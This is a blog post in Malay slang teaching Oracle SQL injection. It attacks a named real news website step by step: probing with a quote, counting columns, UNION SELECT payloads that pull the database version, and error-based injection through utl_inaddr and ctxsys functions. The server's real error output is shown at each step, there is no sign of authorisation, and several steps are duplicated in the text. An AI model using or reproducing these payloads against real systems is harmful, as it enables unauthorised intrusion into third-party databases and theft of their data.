So we gonna play with Oracle Database Injection
our target :
http://www3.inn.clFirst using Union Based injection
1 - Kita mulakan check vuln dgn letak single quote '
jika ade vuln,ia akan keluarkan error :
2 - Kita cari bilangan column mcm biasa. order by 1-- sampai error
dan dari web ni,column yg ade = 9
3 - so kita teruskan dgn union injection kita
jika di sini tiada nombor column yg error kluar..So kita lihat error dia.
FROM keyword not found,bermaksud injection ni kita perlukan FROM.
Code:
http://www3.inn.cl/noticias/index.php?id=2372'
Quote:Kita dapat lihat ORA-01756,dan dgn segera tahulah ini oracle injection kn?
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
2 - Kita cari bilangan column mcm biasa. order by 1-- sampai error
dan dari web ni,column yg ade = 9
3 - so kita teruskan dgn union injection kita
Code:
http://www3.inn.cl/noticias/index.php?id=2372 UNION SELECT 1,2,3,4,5,6,7,8,9
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-00923: FROM keyword not found where expected in /home/www/html/inn/noticias/_index.php on line 6
Utk rujukan :
Sebelum tu,kita perlukan null kan dulu semua nombor column sama mcm dlm posgresql injection.
Dan utk mudahkan kita nk tau column mane bleh diinjek,tukarkan null kepada 0 satu demi satu.
dalam kes ni,column null pertama lepas letak 0 takde error,tp error wujud kalau pada column ke 2.
ini bermaksud,column kedua tu kita leh inject
4 - dlm tutorial nih kita just inject and extrac sampai version() je yer,yg lain2 korang test sdri
dari pentestmonkey,kita tgk ade 3 syntax utk cek version
so kita just amik yg 1st sbg testing.
So..dah berjaya...
Code:
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,null,null,null,null,null,null,null,null--
dalam kes ni,column null pertama lepas letak 0 takde error,tp error wujud kalau pada column ke 2.
ini bermaksud,column kedua tu kita leh inject
4 - dlm tutorial nih kita just inject and extrac sampai version() je yer,yg lain2 korang test sdri
dari pentestmonkey,kita tgk ade 3 syntax utk cek version
Quote:SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
so kita just amik yg 1st sbg testing.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,banner,null,null,null,null,null,null,null FROM v$version WHERE banner LIKE 'Oracle%'--
Quote:Oracle Database 10g Release 10.2.0.1.0 - 64bit Production
Image has been scaled down 22% (800x429). Click this bar to view original image (1022x547). Click image to open in new window.
So..dah berjaya...
Kalau Error Base..kita biasa guna or 1=1 /or 1=2
1 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))function utl_inaddr.get_host_address hanya boleh digunakan kalau
oracle itu adalah version 10g ke bawah..kalau yg 11g kita perlu gunakan
Code:
1=ctxsys.drithsx.sn(1,(sql syntax))
Code:
http://www3.inn.cl/noticias/index.php?id=2372 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in /home/www/html/inn/noticias/_index.php on line 6
Credit to : p0pc0rn @tbd.my
1 comments:
bagus sekali tutorialnya mas..
F3bby
Post a Comment